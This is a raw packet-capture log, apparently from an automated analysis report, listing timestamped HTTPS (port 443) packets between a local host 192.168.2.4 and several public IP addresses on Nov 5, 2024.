                                                                                                                                    Nov 5, 2024 09:03:23.828794956 CET49879443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.829493999 CET4434988013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.829765081 CET4434988013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.830776930 CET4434987813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.830856085 CET49880443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.831001043 CET4434987813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.831883907 CET49878443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.833605051 CET4434987713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.833776951 CET4434987713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.835890055 CET49877443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.844121933 CET4434988113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.844907045 CET4434988113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.844954967 CET49881443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.845005035 CET49884443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.884481907 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.885129929 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.885163069 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.885183096 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.885194063 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.885238886 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.885277033 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.885284901 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.885324955 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.885932922 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.885993958 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.886113882 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.886121035 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.891604900 CET49879443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.891613960 CET4434987913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.891623020 CET49879443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.891628027 CET4434987913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.892491102 CET49877443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.892499924 CET4434987713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.892510891 CET49877443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.892513990 CET4434987713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.894896984 CET49881443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.894905090 CET4434988113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.894922972 CET49881443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.894927025 CET4434988113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.896207094 CET49880443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.896224022 CET4434988013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.897103071 CET49878443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.897116899 CET4434987813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.899410963 CET49890443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.899460077 CET4434989013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.899535894 CET49890443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.899990082 CET49890443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.900002956 CET4434989013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.903127909 CET49891443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.903146029 CET4434989113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.903295994 CET49891443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.905064106 CET49891443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.905076981 CET4434989113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.905798912 CET49892443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.905814886 CET4434989213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.905946970 CET49892443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.906145096 CET49893443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.906155109 CET4434989313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.906205893 CET49893443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.906567097 CET49892443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.906582117 CET4434989213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.907561064 CET49894443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.907567978 CET4434989413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.907599926 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.907669067 CET49894443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.907766104 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.908107996 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.908153057 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.908432007 CET49893443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.908432961 CET49894443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:23.908444881 CET4434989313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.908444881 CET4434989413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.908502102 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.908572912 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.909470081 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.909528971 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.923399925 CET44349866162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.923453093 CET44349866162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.923510075 CET49866443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.927124977 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.927297115 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.927354097 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.927362919 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.927403927 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.941891909 CET44349884162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.941982985 CET44349884162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.942151070 CET49884443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.952035904 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.952110052 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.973778963 CET44349867162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.973834991 CET44349867162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.973934889 CET44349867162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.973995924 CET49867443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.974005938 CET49867443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.002533913 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.002990007 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.003393888 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.003441095 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.003448009 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.003456116 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.003479958 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.003848076 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.004240990 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.004285097 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.004292011 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.004339933 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.031573057 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.031668901 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.032052994 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.032104015 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.032830000 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.032877922 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.033216000 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.033263922 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.045974970 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.065099955 CET49866443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.065108061 CET44349866162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.065399885 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.065417051 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.065476894 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.076174974 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.076230049 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.076586008 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.076639891 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.077909946 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.077919006 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.083148003 CET49884443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.083154917 CET44349884162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.083456039 CET49896443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.083466053 CET44349896162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.083528042 CET49896443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.084264994 CET49896443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.084275961 CET44349896162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.086220026 CET49867443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.086225986 CET44349867162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.086508989 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.086534023 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.086622953 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.087759972 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.087766886 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.096306086 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.096312046 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.121591091 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.121646881 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.121654034 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.121656895 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.121679068 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.121695042 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.122992992 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.123001099 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.123045921 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.123053074 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.124671936 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:24.124680996 CET4434989934.251.39.134192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.124792099 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:24.124975920 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:24.124985933 CET4434989934.251.39.134192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.155565023 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.155643940 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.156084061 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.156116962 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.156126976 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.156136036 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.156156063 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.156917095 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.156981945 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.156990051 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.165072918 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.165127993 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.165137053 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.165194988 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.199681044 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.199747086 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.199774027 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.199831009 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.205388069 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.205642939 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.205658913 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.206685066 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.206746101 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.207254887 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.207333088 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.207922935 CET49901443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.207959890 CET44349901162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.208035946 CET49901443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.208188057 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.208194971 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.208475113 CET49901443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.208488941 CET44349901162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.210592985 CET49902443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.210609913 CET44349902162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.210669041 CET49902443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.211291075 CET49902443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.211308956 CET44349902162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.212800980 CET49903443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.212812901 CET44349903162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.212928057 CET49903443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.213148117 CET49903443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.213157892 CET44349903162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.214531898 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.214914083 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.214922905 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.215986967 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.216056108 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.216362953 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.216425896 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.216487885 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.216495037 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.240216017 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.240223885 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.240268946 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.240525961 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.240533113 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.240575075 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.241746902 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.241754055 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.241792917 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.256383896 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.256769896 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.256777048 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.257113934 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.257548094 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.257606030 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.257615089 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.259618044 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.259618044 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.276590109 CET4434988813.107.246.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.276781082 CET49888443192.168.2.413.107.246.45
                                                                                                                                    Nov 5, 2024 09:03:24.276789904 CET4434988813.107.246.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.277803898 CET4434988813.107.246.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.277858019 CET49888443192.168.2.413.107.246.45
                                                                                                                                    Nov 5, 2024 09:03:24.278187990 CET49888443192.168.2.413.107.246.45
                                                                                                                                    Nov 5, 2024 09:03:24.278259993 CET4434988813.107.246.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.278292894 CET49888443192.168.2.413.107.246.45
                                                                                                                                    Nov 5, 2024 09:03:24.279036045 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.279222965 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.279231071 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.279575109 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.279870033 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.279931068 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.279975891 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.280200005 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.280208111 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.280245066 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.280256987 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.280272007 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.280281067 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.280306101 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.280325890 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.284277916 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.284336090 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.303332090 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.306548119 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.319338083 CET4434988813.107.246.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.321784019 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.321789026 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.321818113 CET49888443192.168.2.413.107.246.45
                                                                                                                                    Nov 5, 2024 09:03:24.321824074 CET4434988813.107.246.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.325126886 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.325186968 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.354279041 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.354453087 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.354485989 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.354496002 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.354505062 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.354547024 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.354863882 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.355173111 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.355241060 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.355247974 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.355367899 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.355402946 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.355410099 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.358983994 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.359047890 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.359046936 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.359091997 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.359282017 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.359289885 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.359292984 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.359301090 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.359339952 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.359541893 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.359544992 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.359549046 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.359554052 CET44349905162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.359613895 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.360387087 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.360398054 CET44349905162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.361999035 CET49888443192.168.2.413.107.246.45
                                                                                                                                    Nov 5, 2024 09:03:24.364932060 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.364954948 CET44349906162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.365005970 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.365180016 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.365190983 CET44349906162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.401921034 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.404335022 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.404356956 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.404397964 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.404405117 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.404444933 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.464637995 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.464690924 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.464704037 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.477781057 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.477953911 CET44349889104.17.247.203192.168.2.4
